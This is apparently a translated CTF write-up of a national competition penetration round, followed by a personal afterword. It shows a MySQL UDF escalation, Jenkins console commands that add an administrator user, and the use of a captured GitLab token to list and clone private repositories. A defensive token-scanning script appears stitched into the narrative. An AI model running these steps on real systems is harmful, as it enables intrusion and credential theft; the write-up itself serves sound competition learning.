[->]WIN-PC3788
[->]192.168.8.26
[*] NetBios: 192.168.8.38 WORKGROUP\WIN-OPS88
[*] WebTitle: http://192.168.8.9 code:200 len:43679 title:VertexSoft
[*] WebTitle: http://192.168.8.146:8080 code:302 len:0 title:None 跳转url: http://192.168.8.146:8080/login;jsessionid=90755EEEA0F7C042B6BED5B745C68D14
[*] WebTitle: http://192.168.8.146:8080/login;jsessionid=90755EEEA0F7C042B6BED5B745C68D14 code:200 len:1383 title:Master ERP login Form
[*] WebTitle: http://192.168.8.42 code:302 len:99 title:None 跳转url: http://192.168.8.42/users/sign_in
[*] WebTitle: http://192.168.8.42:8060 code:404 len:555 title:404 Not Found
[*] WebTitle: http://192.168.8.26:8080 code:200 len:147 title:第一个 JSP 程序
[*] WebTitle: http://192.168.8.16:8080 code:403 len:594 title:None
[*] WebTitle: https://192.168.8.9:8172 code:404 len:0 title:None
[*] WebTitle: http://192.168.8.9:8000 code:200 len:4018 title:Modbus Monitor - VertexSoft Internal Attendance System
[*] WebTitle: http://192.168.8.42/users/sign_in code:200 len:11166 title:登录 · GitLab
[+] http://192.168.8.146:8080 poc-yaml-spring-actuator-heapdump-file
[+] http://192.168.8.146:8080 poc-yaml-springboot-env-unauth spring2
[+] mysql:192.168.8.38:3306:root 123456

WIN-OPS88

fscan found a weak MySQL password; connected with DataGrip and escalated via UDF. Didn't expect it to be a Windows UDF though, which is a bit rare ☝🤓

select 0xxxxx into dumpfile  "C:\\Program Files\\MySQL\\MySQL Server 8.0\\lib\\plugin\\exp.dll"

Find the dll used for UDF locally.

WIN-PC3788

Originally wanted to hit the RODC and thought this was it, then hit the wrong box; took first blood anyway, 4 solves in the end. Bro, why only 500 points, annoying.

Scanned out a backup/upload directory, which is a PUT file-upload vulnerability, but the upload directory doesn't parse JSP, so I tried to bypass it.


Then connected with Godzilla, uploaded SweetPotato, and escalated successfully.

Jenkins

Jenkins login admin:admin123.

Got it straight from the script console:

println "net user test qwer1234! /add".execute().text
println "net localgroup administrators test /add".execute().text

Remote desktop in.

Gitlab

Same as the original Yunjing (云境) challenge: find .jenkins, get the encrypted token, decrypt it in the script console, then just run the following:

proxychains -f /home/siroha/socks5 curl --header "PRIVATE-TOKEN: glpat-bGEgHAJDvwaPP78rsLeS" "http://192.168.8.42/api/v4/projects"
[
{
"id": 5,
"description": null,
"name": "VertexSoftBackup",
"name_with_namespace": "VertexSoft / VertexSoftBackup",
"path": "vertexsoftbackup",
"path_with_namespace": "vertexsoft/vertexsoftbackup",
"created_at": "2024-07-11T17:03:43.603Z",
"default_branch": "main",
"tag_list": [],
"topics": [],
"ssh_url_to_repo": "git@192.168.8.42:vertexsoft/vertexsoftbackup.git",
"http_url_to_repo": "http://192.168.8.42/vertexsoft/vertexsoftbackup.git",
"web_url": "http://192.168.8.42/vertexsoft/vertexsoftbackup",
"readme_url": "http://192.168.8.42/vertexsoft/vertexsoftbackup/-/blob/main/README.md",
"forks_count": 0,
"avatar_url": null,
"star_count": 0,
"last_activity_at": "2024-07-17T05:42:29.243Z",
"namespace": {
"id": 2,
"name": "VertexSoft",
"path": "vertexsoft",
"kind": "group",
"full_path": "vertexsoft",
"parent_id": null,
"avatar_url": null,
"web_url": "http://192.168.8.42/groups/vertexsoft"
},
"repository_storage": "default",
"_links": {
"self": "http://192.168.8.42/api/v4/projects/5",
"issues": "http://192.168.8.42/api/v4/projects/5/issues",
"merge_requests": "http://192.168.8.42/api/v4/projects/5/merge_requests",
"repo_branches": "http://192.168.8.42/api/v4/projects/5/repository/branches",
"labels": "http://192.168.8.42/api/v4/projects/5/labels",
"events": "http://192.168.8.42/api/v4/projects/5/events",
"members": "http://192.168.8.42/api/v4/projects/5/members",
"cluster_agents": "http://192.168.8.42/api/v4/projects/5/cluster_agents"
},
"packages_enabled": true,
"empty_repo": false,
"archived": false,
"visibility": "private",
"resolve_outdated_diff_discussions": false,
"container_expiration_policy": {
"cadence": "1d",
"enabled": false,
"keep_n": 10,
"older_than": "90d",
"name_regex": ".*",
"name_regex_keep": null,
"next_run_at": "2024-07-12T17:03:43.667Z"
},
"repository_object_format": "sha1",
"issues_enabled": true,
"merge_requests_enabled": true,
"wiki_enabled": true,
"jobs_enabled": true,
"snippets_enabled": true,
"container_registry_enabled": true,
"service_desk_enabled": false,
"service_desk_address": null,
"can_create_merge_request_in": true,
"issues_access_level": "enabled",
"repository_access_level": "enabled",
"merge_requests_access_level": "enabled",
"forking_access_level": "enabled",
"wiki_access_level": "enabled",
"builds_access_level": "enabled",
"snippets_access_level": "enabled",
"pages_access_level": "private",
"analytics_access_level": "enabled",
"container_registry_access_level": "enabled",
"security_and_compliance_access_level": "private",
"releases_access_level": "enabled",
"environments_access_level": "enabled",
"feature_flags_access_level": "enabled",
"infrastructure_access_level": "enabled",
"monitor_access_level": "enabled",
"model_experiments_access_level": "enabled",
"model_registry_access_level": "enabled",
"emails_disabled": false,
"emails_enabled": true,
"shared_runners_enabled": true,
"lfs_enabled": true,
"creator_id": 1,
"import_url": null,
"import_type": null,
"import_status": "none",
"open_issues_count": 0,
"description_html": "",
"updated_at": "2024-07-17T05:42:29.243Z",
"ci_default_git_depth": 20,
"ci_forward_deployment_enabled": true,
"ci_forward_deployment_rollback_allowed": true,
"ci_job_token_scope_enabled": false,
"ci_separated_caches": true,
"ci_allow_fork_pipelines_to_run_in_parent_project": true,
"build_git_strategy": "fetch",
"keep_latest_artifact": true,
"restrict_user_defined_variables": false,
"runners_token": "GR1348941cVxxrGfbYCRyHzGyNtRE",
"runner_token_expiration_interval": null,
"group_runners_enabled": true,
"auto_cancel_pending_pipelines": "enabled",
"build_timeout": 3600,
"auto_devops_enabled": true,
"auto_devops_deploy_strategy": "continuous",
"ci_config_path": null,
"public_jobs": true,
"shared_with_groups": [],
"only_allow_merge_if_pipeline_succeeds": false,
"allow_merge_on_skipped_pipeline": null,
"request_access_enabled": true,
"only_allow_merge_if_all_discussions_are_resolved": false,
"remove_source_branch_after_merge": true,
"printing_merge_request_link_enabled": true,
"merge_method": "merge",
"squash_option": "default_off",
"enforce_auth_checks_on_uploads": true,
"suggestion_commit_message": null,
"merge_commit_template": null,
"squash_commit_template": null,
"issue_branch_template": null,
"warn_about_potentially_unwanted_characters": true,
"autoclose_referenced_issues": true,
"permissions": {
"project_access": null,
"group_access": {
"access_level": 50,
"notification_level": 3
}
}
},
{
"id": 4,
"description": "Hexo",
"name": "Hexo",
"name_with_namespace": "VertexSoft / Hexo",
"path": "hexo",
"path_with_namespace": "vertexsoft/hexo",
"created_at": "2024-07-11T17:01:31.691Z",
"default_branch": "master",
"tag_list": [],
"topics": [],
"ssh_url_to_repo": "git@192.168.8.42:vertexsoft/hexo.git",
"http_url_to_repo": "http://192.168.8.42/vertexsoft/hexo.git",
"web_url": "http://192.168.8.42/vertexsoft/hexo",
"readme_url": "http://192.168.8.42/vertexsoft/hexo/-/blob/master/README.md",
"forks_count": 0,
"avatar_url": null,
"star_count": 0,
"last_activity_at": "2024-07-11T17:01:31.661Z",
"namespace": {
"id": 2,
"name": "VertexSoft",
"path": "vertexsoft",
"kind": "group",
"full_path": "vertexsoft",
"parent_id": null,
"avatar_url": null,
"web_url": "http://192.168.8.42/groups/vertexsoft"
},
"repository_storage": "default",
"_links": {
"self": "http://192.168.8.42/api/v4/projects/4",
"issues": "http://192.168.8.42/api/v4/projects/4/issues",
"merge_requests": "http://192.168.8.42/api/v4/projects/4/merge_requests",
"repo_branches": "http://192.168.8.42/api/v4/projects/4/repository/branches",
"labels": "http://192.168.8.42/api/v4/projects/4/labels",
"events": "http://192.168.8.42/api/v4/projects/4/events",
"members": "http://192.168.8.42/api/v4/projects/4/members",
"cluster_agents": "http://192.168.8.42/api/v4/projects/4/cluster_agents"
},
"packages_enabled": true,
"empty_repo": false,
"archived": false,
"visibility": "private",
"resolve_outdated_diff_discussions": false,
"container_expiration_policy": {
"cadence": "1d",
"enabled": false,
"keep_n": 10,
"older_than": "90d",
"name_regex": ".*",
"name_regex_keep": null,
"next_run_at": "2024-07-12T17:01:32.184Z"
},
"repository_object_format": "sha1",
"issues_enabled": true,
"merge_requests_enabled": true,
"wiki_enabled": true,
"jobs_enabled": true,
"snippets_enabled": true,
"container_registry_enabled": true,
"service_desk_enabled": false,
"service_desk_address": null,
"can_create_merge_request_in": true,
"issues_access_level": "enabled",
"repository_access_level": "enabled",
"merge_requests_access_level": "enabled",
"forking_access_level": "enabled",
"wiki_access_level": "enabled",
"builds_access_level": "enabled",
"snippets_access_level": "enabled",
"pages_access_level": "private",
"analytics_access_level": "enabled",
"container_registry_access_level": "enabled",
"security_and_compliance_access_level": "private",
"releases_access_level": "enabled",
"environments_access_level": "enabled",
"feature_flags_access_level": "enabled",
"infrastructure_access_level": "enabled",
"monitor_access_level": "enabled",
"model_experiments_access_level": "enabled",
"model_registry_access_level": "enabled",
"emails_disabled": false,
"emails_enabled": true,
"shared_runners_enabled": true,
"lfs_enabled": true,
"creator_id": 1,
"import_url": null,
"import_type": "gitlab_project",
"import_status": "finished",
"open_issues_count": 0,
"description_html": "<p data-sourcepos=\"1:1-1:4\" dir=\"auto\">Hexo</p>",
"updated_at": "2024-07-11T17:01:32.535Z",
"ci_default_git_depth": 20,
"ci_forward_deployment_enabled": true,
"ci_forward_deployment_rollback_allowed": true,
"ci_job_token_scope_enabled": false,
"ci_separated_caches": true,
"ci_allow_fork_pipelines_to_run_in_parent_project": true,
"build_git_strategy": "fetch",
"keep_latest_artifact": true,
"restrict_user_defined_variables": false,
"runners_token": "GR1348941CyxAy3dnsudA95t35ucx",
"runner_token_expiration_interval": null,
"group_runners_enabled": true,
"auto_cancel_pending_pipelines": "enabled",
"build_timeout": 3600,
"auto_devops_enabled": true,
"auto_devops_deploy_strategy": "continuous",
"ci_config_path": null,
"public_jobs": true,
"shared_with_groups": [],
"only_allow_merge_if_pipeline_succeeds": false,
"allow_merge_on_skipped_pipeline": null,
"request_access_enabled": true,
"only_allow_merge_if_all_discussions_are_resolved": false,
"remove_source_branch_after_merge": true,
"printing_merge_request_link_enabled": true,
"merge_method": "merge",
"squash_option": "default_off",
"enforce_auth_checks_on_uploads": true,
"suggestion_commit_message": null,
"merge_commit_template": null,
"squash_commit_template": null,
"issue_branch_template": null,
"warn_about_potentially_unwanted_characters": true,
"autoclose_referenced_issues": true,
"permissions": {
"project_access": {
"access_level": 40,
"notification_level": null
},
"group_access": {
"access_level": 50,
"notification_level": 3
}
}
},
{
"id": 3,
"description": "VertexSoft Internal Employee Service App",
"name": "VertexApp",
"name_with_namespace": "VertexSoft / VertexApp",
"path": "vertexapp",
"path_with_namespace": "vertexsoft/vertexapp",
"created_at": "2024-07-11T17:00:59.905Z",
"default_branch": "master",
"tag_list": [],
"topics": [],
"ssh_url_to_repo": "git@192.168.8.42:vertexsoft/vertexapp.git",
"http_url_to_repo": "http://192.168.8.42/vertexsoft/vertexapp.git",
"web_url": "http://192.168.8.42/vertexsoft/vertexapp",
"readme_url": "http://192.168.8.42/vertexsoft/vertexapp/-/blob/master/README.md",
"forks_count": 0,
"avatar_url": null,
"star_count": 0,
"last_activity_at": "2024-07-11T17:00:59.877Z",
"namespace": {
"id": 2,
"name": "VertexSoft",
"path": "vertexsoft",
"kind": "group",
"full_path": "vertexsoft",
"parent_id": null,
"avatar_url": null,
"web_url": "http://192.168.8.42/groups/vertexsoft"
},
"repository_storage": "default",
"_links": {
"self": "http://192.168.8.42/api/v4/projects/3",
"issues": "http://192.168.8.42/api/v4/projects/3/issues",
"merge_requests": "http://192.168.8.42/api/v4/projects/3/merge_requests",
"repo_branches": "http://192.168.8.42/api/v4/projects/3/repository/branches",
"labels": "http://192.168.8.42/api/v4/projects/3/labels",
"events": "http://192.168.8.42/api/v4/projects/3/events",
"members": "http://192.168.8.42/api/v4/projects/3/members",
"cluster_agents": "http://192.168.8.42/api/v4/projects/3/cluster_agents"
},
"packages_enabled": true,
"empty_repo": false,
"archived": false,
"visibility": "private",
"resolve_outdated_diff_discussions": false,
"container_expiration_policy": {
"cadence": "1d",
"enabled": false,
"keep_n": 10,
"older_than": "90d",
"name_regex": ".*",
"name_regex_keep": null,
"next_run_at": "2024-07-12T17:01:00.306Z"
},
"repository_object_format": "sha1",
"issues_enabled": true,
"merge_requests_enabled": true,
"wiki_enabled": true,
"jobs_enabled": true,
"snippets_enabled": true,
"container_registry_enabled": true,
"service_desk_enabled": false,
"service_desk_address": null,
"can_create_merge_request_in": true,
"issues_access_level": "enabled",
"repository_access_level": "enabled",
"merge_requests_access_level": "enabled",
"forking_access_level": "enabled",
"wiki_access_level": "enabled",
"builds_access_level": "enabled",
"snippets_access_level": "enabled",
"pages_access_level": "private",
"analytics_access_level": "enabled",
"container_registry_access_level": "enabled",
"security_and_compliance_access_level": "private",
"releases_access_level": "enabled",
"environments_access_level": "enabled",
"feature_flags_access_level": "enabled",
"infrastructure_access_level": "enabled",
"monitor_access_level": "enabled",
"model_experiments_access_level": "enabled",
"model_registry_access_level": "enabled",
"emails_disabled": false,
"emails_enabled": true,
"shared_runners_enabled": true,
"lfs_enabled": true,
"creator_id": 1,
"import_url": null,
"import_type": "gitlab_project",
"import_status": "finished",
"open_issues_count": 0,
"description_html": "<p data-sourcepos=\"1:1-1:40\" dir=\"auto\">VertexSoft Internal Employee Service App</p>",
"updated_at": "2024-07-11T17:01:00.622Z",
"ci_default_git_depth": 20,
"ci_forward_deployment_enabled": true,
"ci_forward_deployment_rollback_allowed": true,
"ci_job_token_scope_enabled": false,
"ci_separated_caches": true,
"ci_allow_fork_pipelines_to_run_in_parent_project": true,
"build_git_strategy": "fetch",
"keep_latest_artifact": true,
"restrict_user_defined_variables": false,
"runners_token": "GR1348941nmFUY2NxrQoLyDNnGYPx",
"runner_token_expiration_interval": null,
"group_runners_enabled": true,
"auto_cancel_pending_pipelines": "enabled",
"build_timeout": 3600,
"auto_devops_enabled": true,
"auto_devops_deploy_strategy": "continuous",
"ci_config_path": null,
"public_jobs": true,
"shared_with_groups": [],
"only_allow_merge_if_pipeline_succeeds": false,
"allow_merge_on_skipped_pipeline": null,
"request_access_enabled": true,
"only_allow_merge_if_all_discussions_are_resolved": false,
"remove_source_branch_after_merge": true,
"printing_merge_request_link_enabled": true,
"merge_method": "merge",
"squash_option": "default_off",
"enforce_auth_checks_on_uploads": true,
"suggestion_commit_message": null,
"merge_commit_template": null,
"squash_commit_template": null,
"issue_branch_template": null,
"warn_about_potentially_unwanted_characters": true,
"autoclose_referenced_issues": true,
"permissions": {
"project_access": {
"access_level": 40,
"notification_level": null
},
"group_access": {
"access_level": 50,
"notification_level": 3
}
}
},
{
"id": 2,
"description": "VertexSoft's old ERP system",
"name": "ERP_Old",
"name_with_namespace": "VertexSoft / ERP_Old",
"path": "erp_old",
"path_with_namespace": "vertexsoft/erp_old",
"created_at": "2024-07-11T17:00:05.051Z",
"default_branch": "master",
"tag_list": [],
"topics": [],
"ssh_url_to_repo": "git@192.168.8.42:vertexsoft/erp_old.git",
"http_url_to_repo": "http://192.168.8.42/vertexsoft/erp_old.git",
"web_url": "http://192.168.8.42/vertexsoft/erp_old",
"readme_url": "http://192.168.8.42/vertexsoft/erp_old/-/blob/master/README.md",
"forks_count": 0,
"avatar_url": null,
"star_count": 0,
"last_activity_at": "2024-07-11T17:00:05.004Z",
"namespace": {
"id": 2,
"name": "VertexSoft",
"path": "vertexsoft",
"kind": "group",
"full_path": "vertexsoft",
"parent_id": null,
"avatar_url": null,
"web_url": "http://192.168.8.42/groups/vertexsoft"
},
"repository_storage": "default",
"_links": {
"self": "http://192.168.8.42/api/v4/projects/2",
"issues": "http://192.168.8.42/api/v4/projects/2/issues",
"merge_requests": "http://192.168.8.42/api/v4/projects/2/merge_requests",
"repo_branches": "http://192.168.8.42/api/v4/projects/2/repository/branches",
"labels": "http://192.168.8.42/api/v4/projects/2/labels",
"events": "http://192.168.8.42/api/v4/projects/2/events",
"members": "http://192.168.8.42/api/v4/projects/2/members",
"cluster_agents": "http://192.168.8.42/api/v4/projects/2/cluster_agents"
},
"packages_enabled": true,
"empty_repo": false,
"archived": false,
"visibility": "private",
"resolve_outdated_diff_discussions": false,
"container_expiration_policy": {
"cadence": "1d",
"enabled": false,
"keep_n": 10,
"older_than": "90d",
"name_regex": ".*",
"name_regex_keep": null,
"next_run_at": "2024-07-12T17:00:07.041Z"
},
"repository_object_format": "sha1",
"issues_enabled": true,
"merge_requests_enabled": true,
"wiki_enabled": true,
"jobs_enabled": true,
"snippets_enabled": true,
"container_registry_enabled": true,
"service_desk_enabled": false,
"service_desk_address": null,
"can_create_merge_request_in": true,
"issues_access_level": "enabled",
"repository_access_level": "enabled",
"merge_requests_access_level": "enabled",
"forking_access_level": "enabled",
"wiki_access_level": "enabled",
"builds_access_level": "enabled",
"snippets_access_level": "enabled",
"pages_access_level": "private",
"analytics_access_level": "enabled",
"container_registry_access_level": "enabled",
"security_and_compliance_access_level": "private",
"releases_access_level": "enabled",
"environments_access_level": "enabled",
"feature_flags_access_level": "enabled",
"infrastructure_access_level": "enabled",
"monitor_access_level": "enabled",
"model_experiments_access_level": "enabled",
"model_registry_access_level": "enabled",
"emails_disabled": false,
"emails_enabled": true,
"shared_runners_enabled": true,
"lfs_enabled": true,
"creator_id": 1,
"import_url": null,
"import_type": "gitlab_project",
"import_status": "finished",
"open_issues_count": 0,
"description_html": "<p data-sourcepos=\"1:1-1:27\" dir=\"auto\">VertexSoft's old ERP system</p>",
"updated_at": "2024-07-11T17:00:07.428Z",
"ci_default_git_depth": 20,
"ci_forward_deployment_enabled": true,
"ci_forward_deployment_rollback_allowed": true,
"ci_job_token_scope_enabled": false,
"ci_separated_caches": true,
"ci_allow_fork_pipelines_to_run_in_parent_project": true,
"build_git_strategy": "fetch",
"keep_latest_artifact": true,
"restrict_user_defined_variables": false,
"runners_token": "GR1348941iNU3bBzdNg5pzdrmapMJ",
"runner_token_expiration_interval": null,
"group_runners_enabled": true,
"auto_cancel_pending_pipelines": "enabled",
"build_timeout": 3600,
"auto_devops_enabled": true,
"auto_devops_deploy_strategy": "continuous",
"ci_config_path": null,
"public_jobs": true,
"shared_with_groups": [],
"only_allow_merge_if_pipeline_succeeds": false,
"allow_merge_on_skipped_pipeline": null,
"request_access_enabled": true,
"only_allow_merge_if_all_discussions_are_resolved": false,
"remove_source_branch_after_merge": true,
"printing_merge_request_link_enabled": true,
"merge_method": "merge",
"squash_option": "default_off",
"enforce_auth_checks_on_uploads": true,
"suggestion_commit_message": null,
"merge_commit_template": null,
"squash_commit_template": null,
"issue_branch_template": null,
"warn_about_potentially_unwanted_characters": true,
"autoclose_referenced_issues": true,
"permissions": {
"project_access": {
"access_level": 40,
"notification_level": null
},
"group_access": {
"access_level": 50,
"notification_level": 3
}
}
},
{
"id": 1,
"description": null,
"name": "PortalCode",
"name_with_namespace": "VertexSoft / PortalCode",
"path": "portalcode",
"path_with_namespace": "vertexsoft/portalcode",
"created_at": "2024-07-11T15:53:27.257Z",
"default_branch": "main",
"tag_list": [],
"topics": [],
"ssh_url_to_repo": "git@192.168.8.42:vertexsoft/portalcode.git",
"http_url_to_repo": "http://192.168.8.42/vertexsoft/portalcode.git",
"web_url": "http://192.168.8.42/vertexsoft/portalcode",
"readme_url": "http://192.168.8.42/vertexsoft/portalcode/-/blob/main/README.md",
"forks_count": 0,
"avatar_url": null,
"star_count": 0,
"last_activity_at": "2024-07-15T14:30:40.441Z",
"namespace": {
"id": 2,
"name": "VertexSoft",
"path": "vertexsoft",
"kind": "group",
"full_path": "vertexsoft",
"parent_id": null,
"avatar_url": null,
"web_url": "http://192.168.8.42/groups/vertexsoft"
},
"repository_storage": "default",
"_links": {
"self": "http://192.168.8.42/api/v4/projects/1",
"issues": "http://192.168.8.42/api/v4/projects/1/issues",
"merge_requests": "http://192.168.8.42/api/v4/projects/1/merge_requests",
"repo_branches": "http://192.168.8.42/api/v4/projects/1/repository/branches",
"labels": "http://192.168.8.42/api/v4/projects/1/labels",
"events": "http://192.168.8.42/api/v4/projects/1/events",
"members": "http://192.168.8.42/api/v4/projects/1/members",
"cluster_agents": "http://192.168.8.42/api/v4/projects/1/cluster_agents"
},
"packages_enabled": true,
"empty_repo": false,
"archived": false,
"visibility": "private",
"resolve_outdated_diff_discussions": false,
"container_expiration_policy": {
"cadence": "1d",
"enabled": false,
"keep_n": 10,
"older_than": "90d",
"name_regex": ".*",
"name_regex_keep": null,
"next_run_at": "2024-07-12T15:53:27.309Z"
},
"repository_object_format": "sha1",
"issues_enabled": true,
"merge_requests_enabled": true,
"wiki_enabled": true,
"jobs_enabled": true,
"snippets_enabled": true,
"container_registry_enabled": true,
"service_desk_enabled": false,
"service_desk_address": null,
"can_create_merge_request_in": true,
"issues_access_level": "enabled",
"repository_access_level": "enabled",
"merge_requests_access_level": "enabled",
"forking_access_level": "enabled",
"wiki_access_level": "enabled",
"builds_access_level": "enabled",
"snippets_access_level": "enabled",
"pages_access_level": "private",
"analytics_access_level": "enabled",
"container_registry_access_level": "enabled",
"security_and_compliance_access_level": "private",
"releases_access_level": "enabled",
"environments_access_level": "enabled",
"feature_flags_access_level": "enabled",
"infrastructure_access_level": "enabled",
"monitor_access_level": "enabled",
"model_experiments_access_level": "enabled",
"model_registry_access_level": "enabled",
"emails_disabled": false,
"emails_enabled": true,
"shared_runners_enabled": true,
"lfs_enabled": true,
"creator_id": 1,
"import_url": null,
"import_type": null,
"import_status": "none",
"open_issues_count": 0,
"description_html": "",
"updated_at": "2024-07-15T14:37:09.617Z",
"ci_default_git_depth": 20,
"ci_forward_deployment_enabled": true,
"ci_forward_deployment_rollback_allowed": true,
"ci_job_token_scope_enabled": false,
"ci_separated_caches": true,
"ci_allow_fork_pipelines_to_run_in_parent_project": true,
"build_git_strategy": "fetch",
"keep_latest_artifact": true,
"restrict_user_defined_variables": false,
"runners_token": "GR13489414oQjRCnTobkTwZpR65iS",
"runner_token_expiration_interval": null,
"group_runners_enabled": true,
"auto_cancel_pending_pipelines": "enabled",
"build_timeout": 3600,
"auto_devops_enabled": true,
"auto_devops_deploy_strategy": "continuous",
"ci_config_path": null,
"public_jobs": true,
"shared_with_groups": [],
"only_allow_merge_if_pipeline_succeeds": false,
"allow_merge_on_skipped_pipeline": null,
"request_access_enabled": true,
"only_allow_merge_if_all_discussions_are_resolved": false,
"remove_source_branch_after_merge": true,
"printing_merge_request_link_enabled": true,
"merge_method": "merge",
"squash_option": "default_off",
"enforce_auth_checks_on_uploads": true,
"suggestion_commit_message": null,
"merge_commit_template": null,
"squash_commit_template": null,
"issue_branch_template": null,
"warn_about_potentially_unwanted_characters": true,
"autoclose_referenced_issues": true,
"permissions": {
"project_access": null,
"group_access": {
"access_level": 50,
"notification_level": 3
}
}
}
]

Clone it with git:

git clone http://192.168.8.42:glpat-bGEgHAJDvwaPP78rsLeS@192.168.8.42/vertexsoft/vertexsoftbackup.git

Inside is a single txt file, and the flag is in it.
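Two things in the steps above are worth looking at from the defender's side: the API dump returns a `runners_token` for every project, and the clone URL carries a `glpat-` personal access token in the userinfo part, where it ends up in shell history, `.git/config` and proxy logs. The following is an added example (my own code, not part of the original writeup or of GitLab) that scans text for both GitLab token formats, flags credentials embedded in repository URLs, and audits a projects response for exposure indicators. The hosts, tokens and project names are constructed placeholders; the 20-character token suffix length and the meaning of access level 50 (Owner) are assumptions based on the format seen on this page and GitLab's documented access levels.

```python
import json
import re
from urllib.parse import urlsplit

# Fixed prefixes GitLab uses for personal access tokens and runner registration
# tokens; the 20-character suffix is the format observed on this page (assumption).
_SUFFIX = r"[0-9A-Za-z_-]{20}"
TOKEN_PATTERNS = {
    "gitlab_pat": re.compile(rf"(?<![0-9A-Za-z_-])glpat-{_SUFFIX}(?![0-9A-Za-z_-])"),
    "gitlab_runner_token": re.compile(rf"(?<![0-9A-Za-z_-])GR1348941{_SUFFIX}(?![0-9A-Za-z_-])"),
}

# Constructed sample: the shape of a GitLab /api/v4/projects response reduced to
# the fields used below, with placeholder hosts and tokens (not the page's values).
SAMPLE_PROJECTS = json.loads("""
[
  {
    "id": 1,
    "path_with_namespace": "example-group/backup",
    "http_url_to_repo": "http://gitlab.example.invalid/example-group/backup.git",
    "visibility": "private",
    "runners_token": "GR1348941EXAMPLEexampleEXAMPL",
    "permissions": {"project_access": null,
                    "group_access": {"access_level": 50, "notification_level": 3}}
  },
  {
    "id": 2,
    "path_with_namespace": "example-group/public-site",
    "http_url_to_repo": "http://gitlab.example.invalid/example-group/public-site.git",
    "visibility": "public",
    "runners_token": null,
    "permissions": {"project_access": {"access_level": 20, "notification_level": null},
                    "group_access": null}
  }
]
""")

# Constructed clone URL in the user:token@host form used in the writeup above.
SAMPLE_CLONE_URL = ("http://gitlab.example.invalid:glpat-EXAMPLEexampleEXAMPL"
                    "@gitlab.example.invalid/example-group/backup.git")


def redact(token: str) -> str:
    """Keep the prefix and last four characters so a finding stays identifiable
    in a report without reproducing a usable secret."""
    return f"{token[:6]}...{token[-4:]}"


def find_tokens(text: str) -> list[tuple[str, str]]:
    """Return (kind, redacted_token) for every GitLab token string found in text."""
    findings = []
    for kind, pattern in TOKEN_PATTERNS.items():
        for match in pattern.finditer(text):
            findings.append((kind, redact(match.group(0))))
    return findings


def url_has_embedded_credentials(url: str) -> bool:
    """True when a URL carries a userinfo part (user:secret@host)."""
    parts = urlsplit(url)
    return parts.username is not None or parts.password is not None


def audit_projects(projects: list[dict]) -> dict[str, list[str]]:
    """Walk a projects response and flag what a defender treats as exposure:
    runner tokens handed back to the caller, and Owner rights on private projects."""
    report = {}
    for project in projects:
        issues = []
        token = project.get("runners_token") or ""
        if TOKEN_PATTERNS["gitlab_runner_token"].fullmatch(token):
            issues.append("runners_token returned in API response")
        perms = project.get("permissions") or {}
        group_level = (perms.get("group_access") or {}).get("access_level")
        if project.get("visibility") == "private" and group_level == 50:
            issues.append("caller has Owner (50) access on a private project")
        report[project["path_with_namespace"]] = issues
    return report


if __name__ == "__main__":
    print(find_tokens(json.dumps(SAMPLE_PROJECTS)))
    print(find_tokens(SAMPLE_CLONE_URL), url_has_embedded_credentials(SAMPLE_CLONE_URL))
    for path, issues in audit_projects(SAMPLE_PROJECTS).items():
        print(path, issues or ["ok"])
```

Running the same `find_tokens` over CI logs, pasted API output or `git remote -v` output is the cheap check here; the mitigation on the operator side is to hand tokens to git through a credential helper or `CI_JOB_TOKEN` rather than the URL, and to rotate any `runners_token` or `glpat-` value that has appeared in a log or dump.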

RODC

A pity: I didn't get the 600-point one with 30-odd solves. Apparently there was a file on the MySQL box we had taken over with credentials in it. Damn, couldn't get a problem with 30-plus solves but took first blood on one with 4 solves; I'm speechless at myself.

Doing penetration alone, your thinking just stays too narrow.


Fortunately we still took a national first prize in the end, rank 14.

Afterword

The performance this time wasn't perfect. Honestly I wasn't that confident in myself this time, and the pressure was considerable, because our team wasn't originally the strongest one. We hadn't held much hope of pushing for a national first prize ourselves; the idea was that 山河 giegie's team would go for the first prize and we would lock in a second prize or so, and then, barring surprises, a surprise happened. So the task of taking a first prize fell to us: our team is one web, one pwn, one re, one misc. Honestly, an onsite national final, especially with a format where AWDP and penetration carry most of the weight, is a comparative disadvantage for us. Many other teams seemed to have two web players, and holding up against that is hard. The night before the official competition I told k✌ that as a single web player, going up against other teams' two web players felt a bit much; he said I had to believe in myself, one web against two web is no problem.

The outcome was good; it was just some small mistakes of my own, so the performance wasn't that perfect. Top ten was actually within reach, but I slipped up on both days. Oh well, life is never perfect, there is always some regret; this year's regret I can accept. Last year, 山河 giegie's team fell into a huge pit in AWD: the 赛宁 AWD gave private-key logins, but all four of them used FinalShell and had no Xshell, and FinalShell couldn't log in with a private key; they reportedly waited over an hour for a staff member to copy Xshell over. Losing an hour in AWD, imagine what that means. k✌ said they placed 60-something in AWD; fortunately they scored in penetration on day two and climbed to a national second prize. A real pity, it should have been a first prize. So they planned to go another year for a first, but fate is unpredictable, and this year they retired early in the regional round 😭. A salute here to the legendary web player 山河.

This year's Shanghai university onsite was also an AWD run by 赛宁. I was with inkey and 🐱✌; before the start, hearing the judge say the target machines were logged into with a file, I had a flashback and immediately told inkey✌ to download an Xshell right away.

Carrying 山河 giegie's will and our advisor's expectations, we rode a hot hand to the national first prize; k✌, having to face off against real life, retired right after this one. As a classic line goes, "Now that a national first prize is right in front of me, I have to consider whether this might be the only chance of my life." Chances to play nationals are few: in the second semester of year one it's hard to have the qualification or the strength to reach the national final, and year two is the most promising year, because in year three internships, job hunting and all sorts of things split your attention and the odds of pushing for a first prize shrink.

After the competition, a walk around Sichuan.

This beautiful Sichuan scenery, this architecture; a certain school in the Beijing suburbs is envious.


And the world line of the last day.

Went stamp-collecting at the anime convention and caught a 宁宁 cosplayer ☝🤓; I had barely seen any before and didn't expect someone to do it in Chengdu. I boldly went up to her, and she gave out free goods, very thoughtful.


Very exquisite, even with contact info, sincerely inviting us to add friends; the only pity is that it was the 22nd rather than the 21st, otherwise this 宁宁 would have been a stroke of genius.


And some itasha...

The Chengdu trip is over. Honestly, having taken a first prize, I could choose to retire and do things I enjoy, but the school team's class of 23 has no web player, so I still have to think about finding a new web carry; the story continues.